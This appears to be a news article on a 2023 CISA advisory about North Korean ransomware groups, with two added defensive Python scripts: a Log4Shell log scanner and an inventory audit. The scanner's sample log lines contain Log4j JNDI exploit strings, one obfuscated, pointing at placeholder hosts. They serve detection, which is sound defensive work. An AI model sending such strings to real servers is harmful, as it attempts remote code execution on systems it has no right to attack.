North Korea Ransomware Attacks, A Global Threat? US Warns.

North Korea Ransomware Attacks, Should We Be Afraid? US Warns.

The United States Cybersecurity and Infrastructure Security Agency (CISA) has issued a warning about state-sponsored ransomware attacks by the North Korean nation-state against critical infrastructure.

As part of its #StopRansomware campaign against ransomware, CISA collaborated with several partner agencies: the National Security Agency (NSA), the Federal Bureau of Investigation (FBI), the Department of Health and Human Services (HHS), and, from the Republic of Korea (ROK), the National Intelligence Service (NIS) and the ROK Defense Security Agency (DSA).

The joint advisory was released on Thursday, 09 February 2023. It builds on Alert AA22-187A, published by CISA on 06 July 2022, and summarizes the state-sponsored ransomware activity of hacking groups in the Democratic People's Republic of Korea (DPRK).

The document also analyses activity attributed to two groups, known as Maui and H0lyGh0st. The tactics, techniques and procedures (TTPs) CISA describes include acquiring infrastructure such as domains, credentials and accounts, often using stolen personal identities.

The advisory states that the threat actors acquired virtual private networks (VPNs) and servers whose IP addresses correspond to third-world countries, in order to keep their actual location hidden. They also exploited known security flaws (e.g., CVE-2021-44228, CVE-2021-20038 and CVE-2022-24990) in Apache Log4j, SonicWall and TerraMaster NAS appliances, using customized payloads that let the attacker perform reconnaissance (information gathering) with various techniques and execute shell commands.
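Of the three flaws listed above, CVE-2021-44228 (Log4Shell) leaves a recognisable trace in web-server logs, because the exploit string is a Log4j lookup placed in a client-controlled field such as the User-Agent or a query parameter. The following detection script is an added example for defenders; it is not code from the advisory or from the article's author. It scans constructed sample access-log lines (the IP addresses are RFC 5737 documentation addresses), collapses the `${lower:...}`/`${upper:...}` wrappers that are commonly used to break naive matching, and reports the client IP of every line carrying a JNDI lookup. The log format and field positions are assumptions for the demonstration.

```python
import re

# Constructed sample access-log lines for demonstration only (not from the advisory).
# IPs are RFC 5737 documentation addresses; two lines carry a JNDI lookup, two are benign.
SAMPLE_LOG_LINES = [
    '203.0.113.10 - - [09/Feb/2023:10:01:02 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.11 - - [09/Feb/2023:10:01:05 +0000] "GET /login HTTP/1.1" 200 1024 "-" "${jndi:ldap://198.51.100.7:1389/a}"',
    '203.0.113.12 - - [09/Feb/2023:10:01:09 +0000] "GET /api/v1/items HTTP/1.1" 404 120 "-" "curl/7.88"',
    '203.0.113.13 - - [09/Feb/2023:10:01:11 +0000] "GET /?q=${${lower:j}ndi:rmi://198.51.100.8/b} HTTP/1.1" 400 0 "-" "-"',
]

# Innermost case-conversion lookups such as ${lower:j} or ${upper:N}; we keep only
# the argument so that nested forms collapse to the plain text Log4j would resolve.
_WRAPPER = re.compile(r"\$\{(?:lower|upper):([^{}]*)\}", re.IGNORECASE)
# A plain JNDI lookup, matched after normalisation.
_JNDI = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)


def normalize_lookups(text: str) -> str:
    """Collapse nested lower/upper lookups repeatedly until none remain."""
    prev = None
    while prev != text:
        prev, text = text, _WRAPPER.sub(r"\1", text)
    return text


def is_log4shell_probe(line: str) -> bool:
    """True if any field of the line contains a JNDI lookup string."""
    return bool(_JNDI.search(normalize_lookups(line)))


def scan_log(lines):
    """Return (client_ip, line) for every line that carries a JNDI lookup.

    Assumes Common/Combined Log Format, where the client IP is the first token.
    """
    hits = []
    for line in lines:
        if is_log4shell_probe(line):
            client_ip = line.split(" ", 1)[0]
            hits.append((client_ip, line))
    return hits


if __name__ == "__main__":
    for ip, line in scan_log(SAMPLE_LOG_LINES):
        print(f"ALERT possible CVE-2021-44228 exploitation attempt from {ip}: {line}")
```

A hit only shows that an exploitation attempt reached the server; whether it succeeded depends on the Log4j version in use, so a positive match should trigger a check of the affected host's outbound connections around that timestamp rather than be treated as a confirmed compromise on its own.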

The payloads deliver ransomware the attackers built privately on top of ready-made tools (e.g. BitLocker, Deadbolt, YourRansom and ech0raix), which are capable of encrypting files. After modification, the malware was distributed through a well-known deceptive method, a Trojan horse embedded in the messenger app X-Popup, targeting small and medium-sized medical firms in South Korea.


CISA recommends adopting the principle of least privilege. Organizations are also advised to disable network devices that are not in use, practise multi-layer network segmentation, use phishing-resistant authentication controls, and back up their data periodically.
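Three of those recommendations (disabling unused devices, phishing-resistant authentication and periodic backups, plus least privilege for administrative roles) can be checked mechanically against an inventory. The script below is an added example of such an audit and is not part of the advisory or the article; it runs over constructed sample records, and the field names, the 60-day staleness window and the 7-day backup age limit are assumptions chosen for the demonstration, not values from CISA.

```python
from datetime import date, timedelta

# Constructed sample inventory records (hypothetical; not from the advisory).
DEVICES = [
    {"name": "edge-fw-01", "role": "firewall", "last_seen": date(2023, 2, 8), "enabled": True},
    {"name": "legacy-vpn-02", "role": "vpn", "last_seen": date(2022, 10, 1), "enabled": True},
    {"name": "nas-backup-01", "role": "nas", "last_seen": date(2023, 2, 9), "enabled": True},
]
ACCOUNTS = [
    {"user": "alice", "roles": ["domain-admin"], "mfa": "fido2", "last_admin_use": date(2023, 2, 7)},
    {"user": "bob", "roles": ["domain-admin", "helpdesk"], "mfa": "sms", "last_admin_use": date(2022, 9, 1)},
    {"user": "carol", "roles": ["helpdesk"], "mfa": "totp", "last_admin_use": None},
]
BACKUPS = [
    {"system": "nas-backup-01", "last_successful": date(2023, 2, 9)},
    {"system": "file-server", "last_successful": date(2023, 1, 10)},
]

# MFA methods treated as phishing-resistant (assumption for this example).
PHISHING_RESISTANT = {"fido2", "webauthn", "piv"}


def audit(devices, accounts, backups, today, stale_days=60, backup_max_age_days=7):
    """Return a list of (finding, subject) tuples for policy violations.

    - enabled devices not seen within stale_days are candidates to disable
    - accounts whose MFA method is not phishing-resistant
    - domain-admin role holders who have not used the role within stale_days
    - backup sets whose last success is older than backup_max_age_days
    """
    findings = []
    stale_cutoff = today - timedelta(days=stale_days)

    for dev in devices:
        if dev["enabled"] and dev["last_seen"] < stale_cutoff:
            findings.append(("disable-unused-device", dev["name"]))

    for acct in accounts:
        if acct["mfa"] not in PHISHING_RESISTANT:
            findings.append(("non-phishing-resistant-mfa", acct["user"]))
        if "domain-admin" in acct["roles"]:
            last = acct["last_admin_use"]
            if last is None or last < stale_cutoff:
                findings.append(("unused-admin-role", acct["user"]))

    for bkp in backups:
        if (today - bkp["last_successful"]).days > backup_max_age_days:
            findings.append(("backup-too-old", bkp["system"]))

    return findings


if __name__ == "__main__":
    for finding, subject in audit(DEVICES, ACCOUNTS, BACKUPS, today=date(2023, 2, 9)):
        print(f"{finding}: {subject}")
```

Run against the sample data it flags the stale VPN appliance, the two accounts still relying on SMS or TOTP codes, the admin role that has sat unused for months, and the backup set that has not succeeded in a month. Network segmentation is deliberately absent from the check: it is a property of the network design rather than of any single inventory record, so it has to be verified with reachability tests between zones instead.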

The scale of the compromise is considerable: digital assets worth $630 million (US dollars) were compromised.

Roman Arutyunov, co-founder of Xage Security, advised that critical infrastructure providers should adopt these measures, even though implementing them can seem complicated.

According to a United Nations panel of experts, as reported by AP on Tuesday, 7 February 2023, the threat actors used quite sophisticated techniques to gain access to networks in the cyber-finance sector, criminally obtaining information of considerable value to North Korea's nuclear and ballistic missile programs, with targets spanning governments, individuals and multinational companies.



Please let us know in the comments section what you think about this.
